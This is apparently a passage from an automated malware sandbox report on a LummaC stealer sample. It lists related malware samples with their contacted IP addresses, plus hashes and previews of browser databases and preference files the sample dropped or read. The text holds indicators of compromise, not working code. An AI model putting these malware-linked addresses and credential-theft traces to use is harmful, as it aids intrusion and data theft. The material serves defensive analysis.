                                                                                                                                                                                                                                                                                    singl6.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                    • 20.198.119.84
                                                                                                                                                                                                                                                                                    hnskdfgjgar22.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                                    • 20.198.119.84
                                                                                                                                                                                                                                                                                    Proforma Invoice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                                                                                    • 20.198.119.84
                                                                                                                                                                                                                                                                                    Azygoses125.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                                                    • 20.198.119.84
                                                                                                                                                                                                                                                                                    37f463bf4616ecd445d4a1937da06e19New PO - Supplier 0202AW-PER2.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                                                                    • 188.245.216.205
                                                                                                                                                                                                                                                                                    RNEQTT.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                                                                    • 188.245.216.205
                                                                                                                                                                                                                                                                                    installer.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                                                                    • 188.245.216.205
                                                                                                                                                                                                                                                                                    #U65b0#U5efa #U6587#U672c#U6587#U6863.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                                                                    • 188.245.216.205
                                                                                                                                                                                                                                                                                    T1#U5b89#U88c5#U52a9#U624b1.0.2.exeGet hashmaliciousNitolBrowse
                                                                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                                                                    • 188.245.216.205
                                                                                                                                                                                                                                                                                    Canvas of Kings_N6xC-S2.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                                                                    • 188.245.216.205
                                                                                                                                                                                                                                                                                    Technonomic.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                                                                    • 188.245.216.205
                                                                                                                                                                                                                                                                                    installer.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                                                                    • 188.245.216.205
                                                                                                                                                                                                                                                                                    Azygoses125.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                                                                    • 188.245.216.205
                                                                                                                                                                                                                                                                                    Violated Heroine_91zbZ-1.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                                                                    • 188.245.216.205
                                                                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\680662\Billion.comvce exam simulator 2.2.1 crackk.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      LVDdWBGnVE.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                                        eMBO6wS1b5.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                                          Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                                            AxoPac.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                              Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                                Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                                  fkawMJ7FH8.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLine, StealcBrowse
                                                                                                                                                                                                                                                                                                    ChoForgot.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                                      94e.exeGet hashmaliciousRemcosBrowse
Process:C:\Users\user\AppData\Local\Temp\680662\Billion.com
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:dropped
Size (bytes):106496
Entropy (8bit):1.136471148832945
Encrypted:false
SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
MD5:37B1FC046E4B29468721F797A2BB968D
SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\680662\Billion.com
                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x37, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):196608
                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.2680272407768105
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:384:L/2qOB1nxCkMqSA1LyKOMq+8iP5GDHP/0jMVumE:Kq+n0Jq91LyKOMq+8iP5GLP/0R
                                                                                                                                                                                                                                                                                                        MD5:A24B9AECDB22ACB1A68C21B6F2ABD338
                                                                                                                                                                                                                                                                                                        SHA1:AC6A14792AA01781E21C1DF1776A72B86E99120B
                                                                                                                                                                                                                                                                                                        SHA-256:E6798C6EFE4FB00679922741727CB363956B5E44288E8006788E513981099D1A
                                                                                                                                                                                                                                                                                                        SHA-512:E89615B66B7999600EC6FA5AF31BDBB5D3985A948ABBC44CF3CC8B63B4662C3D4FCFBA3A17A50DDDE4E02B4226ED75D83FD57A940469F8C5A6A37289797BF1AD
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\680662\Billion.com
                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):51200
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.8745947603342119
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                                                                                                                                                                                                                                        MD5:378391FDB591852E472D99DC4BF837DA
                                                                                                                                                                                                                                                                                                        SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                                                                                                                                                                                                                                        SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                                                                                                                                                                                                                                        SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\680662\Billion.com
                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):294912
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.08436837154972243
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23v2:51zkVmvQhyn+Zoz67f
                                                                                                                                                                                                                                                                                                        MD5:BDDB3A7A4643B027E8E743D32B86297D
                                                                                                                                                                                                                                                                                                        SHA1:AACAA39E60FB34908241F75550B1CEDDA50E37D1
                                                                                                                                                                                                                                                                                                        SHA-256:13BC4A6A15651C116209341E97255C67980005927DFD9E91236E2E1517AF97EF
                                                                                                                                                                                                                                                                                                        SHA-512:9A6244248CA636DB12AEC2E56DEAEAA2D62ED8378EA5A1D9947938DA15CA66BC4EDF11BF7CCC92E43734449EBECD03CF538BB61FCF90798DEBFD65098BC2A444
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\680662\Billion.com
                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):159744
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.5394293526345721
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                                                                                                                                        MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                                                                                                                                        SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                                                                                                                                        SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                                                                                                                                        SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\680662\Billion.com
                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1717), with CRLF line terminators
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):10237
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.498288591230544
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:192:/nTFTRRFYbBp6SLZNMGaXU6qU4rzy+/3/OYiNBw8D7Sl:LreDFNMroyrdw60
                                                                                                                                                                                                                                                                                                        MD5:0F58C61DE9618A1B53735181E43EE166
                                                                                                                                                                                                                                                                                                        SHA1:CC45931CF12AF92935A84C2A015786CC810AEC3A
                                                                                                                                                                                                                                                                                                        SHA-256:AE9C3109DD23F391DC58C564080932100F55C8E674176D7911D54FB0D3417AE0
                                                                                                                                                                                                                                                                                                        SHA-512:DEA527C22D4AA607B00FBBCC1CDD9C6B69E92EC3B1B14649A086E87258AAD5C280BFB2835C165176E8759F575AA39D1B58E25CB40F60C7E88D94243A874B71BE
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "a24b7aae-efcd-4433-83ad-3649b8231e2d");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696486832);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696486836);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\680662\Billion.com
                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):155648
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.5407252242845243
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                                                                                                                                        MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                                                                                                                                        SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                                                                                                                                        SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                                                                                                                                        SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\680662\Billion.com
                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\680662\Billion.com
                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):98304
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                                                                                        MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                                                                                        SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                                                                                        SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                                                                                        SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):46191
                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.0872308975583
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:768:qMkbJrT8IeQc5dKH+ki1zNt9Xi9vVx+DzJ6PRLv9N2aPeCiozJDSgzMMd6qD47uW:qMk1rT8H1KGXi9tD98aPeFoztSmd6qEL
                                                                                                                                                                                                                                                                                                        MD5:0C2F55F2810889C7E4C8ECEF40681771
                                                                                                                                                                                                                                                                                                        SHA1:D96380800C91DC478DBF29FB14C5FE1B9C8361AA
                                                                                                                                                                                                                                                                                                        SHA-256:FFFA8156C8E7892E4242BE478CE4163C0882C1E0643376AFA3E87D0B15893D10
                                                                                                                                                                                                                                                                                                        SHA-512:067F933FDCB416EBA5B04CCA0F5FE3E9D05B903C6B1587AE4F5F8E78093B2DE9E42D77923CBF0D70E8D034051088AFDAF7B8F87416A20204AB96157853177873
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13379538500667114","browser":{"browser_build_version":"117.0.2045.55","browser_version_of_last_seen_whats_new":"117.0.2045.55","last_seen_whats_new_page_version":"117.0.2045.55"},"continuous_migration":{"local_guid":"b801fd64-6919-4229-a38a-8914add27428"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):44922
                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.094890164157997
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWcBi1zNt9Xi9vV90D0sFLEVKJDSgzMMd6qD47u3+CO:+/Ps+wsI7ynEXi9t7KtSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                        MD5:B6486EDCFE7EC256465FBD94C65151CC
                                                                                                                                                                                                                                                                                                        SHA1:6AB9889AA6D83CCFA04862D8E07DDCF31517038B
                                                                                                                                                                                                                                                                                                        SHA-256:3A90483165D0E00667819A4FC2921CD8DEE4CA876BFBA2225E8D5020BED5E26D
                                                                                                                                                                                                                                                                                                        SHA-512:6A051F288452EFCC863D1622BA82F279BB7C1A1F7AD47BCED199CAF09FA4FC12186FFC0AA823C80C77A1E103421CEE6C8984016715004FC82A1F67454B5CF503
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"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
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):44455
                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.08983633118473
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWjdi1zNtPM8kzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynNXkzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                        MD5:DC1D934C1906D196754BA8C1310935B9
                                                                                                                                                                                                                                                                                                        SHA1:E8AA09E10D511EB6414BA6A471E4BF46B9BE88B3
                                                                                                                                                                                                                                                                                                        SHA-256:18114B0A45CCB2E3501BEC4CC5B8E733215B1CE8D8E1CAFDF07DAF4E2728C671
                                                                                                                                                                                                                                                                                                        SHA-512:1011B8D60922B8D87A93284803F1ED8D7B898CA55976E3D12B55C6633FBE22B4103CC16DADA99C81B58A235107DF7C310FC2CF2B5CF9D0108ABE030DC2691E9A
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):44996
                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.095359097095448
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4xWoBi1zNt9Xi9vVx+DzJ6PRLvKJDSgzMMd6qD47u3+7:+/Ps+wsI7yO4Xi9tDKtSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                        MD5:30F8A61041E3646AC096D9DCA4249891
                                                                                                                                                                                                                                                                                                        SHA1:DADD99A19D333404F4B7C4129CDDB679942FC4CE
                                                                                                                                                                                                                                                                                                        SHA-256:7D4D085D803EAEC035E55BE9761F6DC98E3717CB744C476550A160E4FF46871C
                                                                                                                                                                                                                                                                                                        SHA-512:DC6C139ACD8DFDC5D252BA0F65495AE769ADAF75CD84B767EC973F6A0EF307807F220D95ECD5BC1D51287ABB96B2A9B01650D06F7D881B026437A1A4A8E0EF0B
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):44930
                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.095030682540709
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWcBi1zNt9Xi9vVxwxNQsPeGKJDSgzMMd6qD47u3+CO:+/Ps+wsI7ynEXi9t0KtSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                        MD5:C5C719D948684AC649D09EBFD8719922
                                                                                                                                                                                                                                                                                                        SHA1:4E4278B3BDFD4A715FE933EE68F70CBC87CF20B9
                                                                                                                                                                                                                                                                                                        SHA-256:912D6E164AF3574D21FBB491572620C055842B1C0241E1C6A5D35964F2E9E2C2
                                                                                                                                                                                                                                                                                                        SHA-512:019A88D2522646436A138D847C37AF1406B493FE869EEFD10AEB83952EFAD7CA2B393A8001AF7B64E9EDA5F695615ABAACF30B6FFBCCBBE753EEF83244B80F0E
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):44914
                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.09515843332724
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWcBi1zNt9Xi9vVNxxTU4P6KJDSgzMMd6qD47u3+CiB:+/Ps+wsI7ynEXi9t6KtSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                        MD5:619AB52F00800C714E1CB4738CAC6F2D
                                                                                                                                                                                                                                                                                                        SHA1:827F20CEC8220A2E5945192445C2886131311D21
                                                                                                                                                                                                                                                                                                        SHA-256:A126B16BD25778062B2264D04DE2C4C02A7089584A6CA1AB987D9DE35D880DE9
                                                                                                                                                                                                                                                                                                        SHA-512:4B85D0267C0518E7BA270A2F7F654C865ACB42950C3E23FFBB4442C336576D3ECC2CC95CBE200A3BA44DC25B3A7F92868AE5A66ED214EE159223B8B09B9482CC
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                                                                        Size (bytes):44914
                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.09515843332724
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWcBi1zNt9Xi9vVNxxTU4P6KJDSgzMMd6qD47u3+CiB:+/Ps+wsI7ynEXi9t6KtSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                        MD5:619AB52F00800C714E1CB4738CAC6F2D
                                                                                                                                                                                                                                                                                                        SHA1:827F20CEC8220A2E5945192445C2886131311D21
                                                                                                                                                                                                                                                                                                        SHA-256:A126B16BD25778062B2264D04DE2C4C02A7089584A6CA1AB987D9DE35D880DE9
                                                                                                                                                                                                                                                                                                        SHA-512:4B85D0267C0518E7BA270A2F7F654C865ACB42950C3E23FFBB4442C336576D3ECC2CC95CBE200A3BA44DC25B3A7F92868AE5A66ED214EE159223B8B09B9482CC
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):107893
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.640173185101434
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7R:fwUQC5VwBIiElEd2K57P7R
                                                                                                                                                                                                                                                                                                        MD5:68DDA50FDB9AF6E86F170412111C6190
                                                                                                                                                                                                                                                                                                        SHA1:B3171ED37DBCB85AA186B62063672E4E3A218DFE
                                                                                                                                                                                                                                                                                                        SHA-256:56E97854FDFA5C5ADFBAA13F061961DDF48BD400882520B4E886CA79A1EC4D65
                                                                                                                                                                                                                                                                                                        SHA-512:71A8FA2B6FB152BCD0FEAB5FC0F21F8B0CC112FEE14D0992E34BB49A86A3AFFDFFB7DA8FB20B75AD0ED28D75EA296ED65726252984B4666190CF12E22719DEF8
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):4194304
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.04463337709027542
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:192:Wpi0m5tm6nOAt6YoJgA8x5XSggykfhbNNETeIC/0TQsdiRbmn8y08Tcm2RGOdB:mi0Utpigk9hZJWJiE08T2RGOD
                                                                                                                                                                                                                                                                                                        MD5:86B6431DCB15EBC6A16BB38B3B84B49F
                                                                                                                                                                                                                                                                                                        SHA1:AF889C5A058AB79B43065DB86B46902D30470B6E
                                                                                                                                                                                                                                                                                                        SHA-256:E9DE0885C3A33FA068A5847B5CD61BCDCD0F48C938A9F40826F49585A80EDBDB
